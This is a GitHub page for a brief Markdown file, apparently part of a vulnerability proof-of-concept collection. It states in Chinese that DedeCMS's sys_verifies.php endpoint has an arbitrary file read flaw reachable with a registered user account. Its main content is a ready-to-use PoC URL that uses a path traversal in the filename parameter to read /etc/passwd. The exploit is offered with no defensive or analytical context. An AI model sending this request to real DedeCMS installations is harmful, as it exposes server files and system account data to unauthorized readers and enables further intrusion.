Skip to content

Latest commit

 

History

History
10 lines (6 loc) · 195 Bytes

DeDecms接口sys_verifies.php存在任意文件读取漏洞.md

File metadata and controls

10 lines (6 loc) · 195 Bytes

DeDecms接口sys_verifies.php存在任意文件读取漏洞

需前台注册用户权限。

poc

http://ip/dede/sys_verifies.php?action=view&filename=../../../../../etc/passwd